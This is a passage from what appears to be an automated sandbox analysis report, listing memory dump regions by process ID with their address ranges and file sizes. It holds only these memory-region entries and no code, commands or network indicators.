                          4KB

                        • memory/2572-280-0x0000000005790000-0x0000000005791000-memory.dmp
                          Filesize

                          4KB

                        • memory/2572-350-0x0000000005AC0000-0x0000000005AE4000-memory.dmp
                          Filesize

                          144KB

                        • memory/2700-0-0x0000000000000000-mapping.dmp
                        • memory/2888-286-0x0000000000000000-mapping.dmp
                        • memory/2936-103-0x0000000009E10000-0x0000000009E11000-memory.dmp
                          Filesize

                          4KB

                        • memory/2936-17-0x0000000000000000-mapping.dmp
                        • memory/2936-106-0x0000000009D70000-0x0000000009D71000-memory.dmp
                          Filesize

                          4KB

                        • memory/2936-111-0x000000000ABF0000-0x000000000ABF1000-memory.dmp
                          Filesize

                          4KB

                        • memory/2936-26-0x0000000070620000-0x0000000070D0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/3104-227-0x0000000004C80000-0x0000000004CD1000-memory.dmp
                          Filesize

                          324KB

                        • memory/3104-219-0x0000000070E90000-0x000000007157E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/3104-224-0x0000000000BA0000-0x0000000000BA1000-memory.dmp
                          Filesize

                          4KB

                        • memory/3104-222-0x0000000000380000-0x0000000000381000-memory.dmp
                          Filesize

                          4KB

                        • memory/3104-214-0x0000000000000000-mapping.dmp
                        • memory/3268-32-0x0000000000000000-mapping.dmp
                        • memory/3272-13-0x0000000000000000-mapping.dmp
                        • memory/3320-278-0x0000000000000000-mapping.dmp
                        • memory/3320-424-0x0000000003D70000-0x0000000003DBC000-memory.dmp
                          Filesize

                          304KB

                        • memory/3488-10-0x0000000000000000-mapping.dmp
                        • memory/3604-40-0x0000000000000000-mapping.dmp
                        • memory/3604-46-0x0000000070620000-0x0000000070D0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/3604-73-0x0000000007730000-0x0000000007731000-memory.dmp
                          Filesize

                          4KB

                        • memory/3604-79-0x0000000008670000-0x0000000008671000-memory.dmp
                          Filesize

                          4KB

                        • memory/3656-38-0x0000000006F50000-0x0000000006F51000-memory.dmp
                          Filesize

                          4KB

                        • memory/3656-28-0x0000000070620000-0x0000000070D0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/3656-55-0x00000000077D0000-0x00000000077D1000-memory.dmp
                          Filesize

                          4KB

                        • memory/3656-18-0x0000000000000000-mapping.dmp
                        • memory/3656-61-0x00000000078C0000-0x00000000078C1000-memory.dmp
                          Filesize

                          4KB

                        • memory/3656-67-0x0000000007930000-0x0000000007931000-memory.dmp
                          Filesize

                          4KB

                        • memory/3664-15-0x0000000000000000-mapping.dmp
                        • memory/3792-2-0x0000000000000000-mapping.dmp
                        • memory/3792-3-0x0000000000000000-mapping.dmp
                        • memory/3844-30-0x0000000000000000-mapping.dmp
                        • memory/3920-231-0x0000000000000000-mapping.dmp
                        • memory/3972-199-0x0000000000400000-0x0000000000493000-memory.dmp
                          Filesize

                          588KB

                        • memory/3972-200-0x000000000043FCC3-mapping.dmp
                        • memory/3972-202-0x0000000000400000-0x0000000000493000-memory.dmp
                          Filesize

                          588KB

                        • memory/4032-319-0x0000000004590000-0x0000000004591000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-315-0x0000000000000000-mapping.dmp
                        • memory/4036-43-0x0000000070620000-0x0000000070D0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4036-37-0x0000000000000000-mapping.dmp
                        • memory/4120-330-0x0000000000000000-mapping.dmp
                        • memory/4160-161-0x000000000043FCC3-mapping.dmp
                        • memory/4160-164-0x0000000000400000-0x0000000000498000-memory.dmp
                          Filesize

                          608KB

                        • memory/4160-160-0x0000000000400000-0x0000000000498000-memory.dmp
                          Filesize

                          608KB

                        • memory/4176-407-0x00007FF95F710000-0x00007FF9600FC000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/4176-402-0x0000000000000000-mapping.dmp
                        • memory/4192-296-0x0000000000000000-mapping.dmp
                        • memory/4204-384-0x0000000000000000-mapping.dmp
                        • memory/4204-391-0x00007FF95F710000-0x00007FF9600FC000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/4240-322-0x0000000000000000-mapping.dmp
                        • memory/4240-388-0x00000000099C0000-0x00000000099C1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4240-367-0x00000000098E0000-0x00000000098E1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4240-331-0x0000000008070000-0x0000000008071000-memory.dmp
                          Filesize

                          4KB

                        • memory/4240-366-0x0000000009410000-0x0000000009411000-memory.dmp
                          Filesize

                          4KB

                        • memory/4240-355-0x00000000097B0000-0x00000000097E3000-memory.dmp
                          Filesize

                          204KB

                        • memory/4240-339-0x00000000085C0000-0x00000000085C1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4240-324-0x0000000070E90000-0x000000007157E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4240-385-0x00000000099E0000-0x00000000099E1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4268-405-0x0000000000000000-mapping.dmp
                        • memory/4268-410-0x00007FF95F710000-0x00007FF9600FC000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/4288-340-0x0000000000000000-mapping.dmp
                        • memory/4324-305-0x0000000000000000-mapping.dmp
                        • memory/4328-308-0x0000000000000000-mapping.dmp
                        • memory/4348-165-0x000000000043FCC3-mapping.dmp
                        • memory/4348-170-0x0000000000400000-0x0000000000498000-memory.dmp
                          Filesize

                          608KB

                        • memory/4368-166-0x0000000000400000-0x0000000000425000-memory.dmp
                          Filesize

                          148KB

                        • memory/4368-168-0x000000000041A684-mapping.dmp
                        • memory/4368-174-0x0000000000400000-0x0000000000425000-memory.dmp
                          Filesize

                          148KB

                        • memory/4392-196-0x0000000000000000-mapping.dmp
                        • memory/4420-285-0x0000000000000000-mapping.dmp
                        • memory/4420-321-0x0000000005100000-0x0000000005103000-memory.dmp
                          Filesize

                          12KB

                        • memory/4420-316-0x0000000004FD0000-0x0000000004FE1000-memory.dmp
                          Filesize

                          68KB

                        • memory/4420-295-0x0000000000C90000-0x0000000000C91000-memory.dmp
                          Filesize

                          4KB

                        • memory/4420-292-0x0000000000690000-0x0000000000691000-memory.dmp
                          Filesize

                          4KB

                        • memory/4420-290-0x0000000070E90000-0x000000007157E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4452-180-0x000000000041A684-mapping.dmp
                        • memory/4496-306-0x0000000000000000-mapping.dmp
                        • memory/4548-387-0x00007FF95F710000-0x00007FF9600FC000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/4548-383-0x0000000000000000-mapping.dmp
                        • memory/4716-234-0x0000000000400000-0x0000000000434000-memory.dmp
                          Filesize

                          208KB

                        • memory/4716-238-0x0000000000400000-0x0000000000434000-memory.dmp
                          Filesize

                          208KB

                        • memory/4716-236-0x0000000000417A8B-mapping.dmp
                        • memory/4724-242-0x0000000070E90000-0x000000007157E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4724-240-0x0000000000000000-mapping.dmp
                        • memory/4724-246-0x00000000025D0000-0x00000000025D1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4724-243-0x00000000003B0000-0x00000000003B1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4724-263-0x0000000004CF0000-0x0000000004D14000-memory.dmp
                          Filesize

                          144KB

                        • memory/4764-309-0x0000000000000000-mapping.dmp
                        • memory/4776-427-0x0000000000000000-mapping.dmp
                        • memory/4860-121-0x0000000000000000-mapping.dmp
                        • memory/4884-124-0x0000000000000000-mapping.dmp
                        • memory/4892-197-0x0000000006450000-0x000000000645D000-memory.dmp
                          Filesize

                          52KB

                        • memory/4892-192-0x00000000063B0000-0x00000000063B1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4892-191-0x0000000005D10000-0x0000000005DC0000-memory.dmp
                          Filesize

                          704KB

                        • memory/4892-125-0x0000000000000000-mapping.dmp
                        • memory/4892-130-0x0000000070620000-0x0000000070D0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4892-134-0x0000000000FB0000-0x0000000000FB1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5068-143-0x0000000000000000-mapping.dmp
                        • memory/5080-144-0x0000000000000000-mapping.dmp
                        • memory/5088-267-0x000000000041A684-mapping.dmp
                        • memory/5088-269-0x0000000000400000-0x0000000000420000-memory.dmp
                          Filesize

                          128KB

                        • memory/5088-266-0x0000000000400000-0x0000000000420000-memory.dmp
                          Filesize

                          128KB

                        • memory/5092-145-0x0000000000000000-mapping.dmp
                        • memory/5104-307-0x0000000000000000-mapping.dmp
                        • memory/5108-147-0x0000000000000000-mapping.dmp
                        • memory/5112-304-0x0000000000000000-mapping.dmp
                        • memory/5116-334-0x0000000000000000-mapping.dmp
                        • memory/5116-335-0x0000000000000000-mapping.dmp
                        • memory/5116-338-0x00007FF95F710000-0x00007FF9600FC000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/5116-341-0x0000000000CF0000-0x0000000000CF1000-memory.dmp
                          Filesize

                          4KB